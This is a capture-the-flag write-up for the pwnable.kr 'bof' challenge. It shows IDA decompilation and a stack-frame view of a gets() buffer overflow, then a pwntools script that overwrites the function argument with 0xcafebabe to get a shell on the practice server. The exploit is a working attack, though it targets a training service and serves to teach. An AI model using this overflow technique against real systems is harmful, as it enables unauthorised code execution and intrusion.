Running at : nc pwnable.kr 9000
IDA查看
/*
 * Hex-Rays decompilation of func() from the bof binary (IDA listing, gutter
 * numbers dropped).  Reads one unbounded line into a fixed-size stack buffer
 * with gets(), branches on the argument a1, and returns the stack-protector
 * cookie check computed in the epilogue.
 *
 * Defensive note: the cookie in v3 is only verified at return, i.e. after the
 * branch on a1 has already been taken, so it does not protect this decision.
 * The fix is a bounded read (fgets with the buffer size) instead of gets().
 */
unsigned int __cdecl func(int a1)
{
  char s; // [esp+1Ch] [ebp-2Ch] -- first byte of the buffer gets() writes into
  unsigned int v3; // [esp+3Ch] [ebp-Ch] -- stack-protector cookie (gs:0x14 on i386 glibc)

  v3 = __readgsdword(0x14u);
  puts("overflow me : ");
  gets(&s); // input length is not bounded -> stack buffer overflow
  if ( a1 == 0xCAFEBABE )
    system("/bin/sh");
  else
    puts("Nah..");
  return __readgsdword(0x14u) ^ v3; // cookie mismatch is only detected here, after the branch above
}
查看栈,
; IDA stack-frame view of func().  Offsets are relative to ebp: negative
; offsets are locals, +0 / +4 are IDA's `s` / `r` pseudo-members (saved
; frame pointer and return address), +8 onward are the arguments.
-0000002C s db ?                ; start of the gets() buffer (char s at ebp-0x2C)
-0000002B db ? ; undefined
-0000002A db ? ; undefined
-00000029 db ? ; undefined
-00000028 db ? ; undefined
-00000027 db ? ; undefined
-00000026 db ? ; undefined
-00000025 db ? ; undefined
-00000024 db ? ; undefined
-00000023 db ? ; undefined
-00000022 db ? ; undefined
-00000021 db ? ; undefined
-00000020 db ? ; undefined
-0000001F db ? ; undefined
-0000001E db ? ; undefined
-0000001D db ? ; undefined
-0000001C db ? ; undefined
-0000001B db ? ; undefined
-0000001A db ? ; undefined
-00000019 db ? ; undefined
-00000018 db ? ; undefined
-00000017 db ? ; undefined
-00000016 db ? ; undefined
-00000015 db ? ; undefined
-00000014 db ? ; undefined
-00000013 db ? ; undefined
-00000012 db ? ; undefined
-00000011 db ? ; undefined
-00000010 db ? ; undefined
-0000000F db ? ; undefined
-0000000E db ? ; undefined
-0000000D db ? ; undefined
-0000000C var_C dd ?            ; v3 in the decompilation: the stack-protector cookie
-00000008 db ? ; undefined
-00000007 db ? ; undefined
-00000006 db ? ; undefined
-00000005 db ? ; undefined
-00000004 db ? ; undefined
-00000003 db ? ; undefined
-00000002 db ? ; undefined
-00000001 db ? ; undefined
+00000000 s db 4 dup(?)         ; saved ebp
+00000004 r db 4 dup(?)         ; return address
+00000008 arg_0 dd ?            ; a1 in the decompilation (0x2C + 8 = 52 bytes past the start of s)
+0000000C
+0000000C ; end of stack variables
0x2c + 8 = 0x34 = 52，来到 arg_0 的存储空间
exp:
# pwntools script for the bof service listed above: fills the gets() buffer
# in func() up to its first argument (arg_0) and overwrites that argument with
# the constant the function compares against.
from pwn import *

r = remote('pwnable.kr','9000')

# 0x2C bytes from the start of s to the saved ebp, plus 8 bytes for the saved
# ebp and return address, gives 52 bytes of filler before arg_0 (see the
# IDA stack-frame view above).
buf = 52 * 'A'
buf += p32(0xcafebabe)  # the value func() compares a1 against

r.sendline(buf)

# Hand the connection over to the user once the input has been sent.
r.interactive()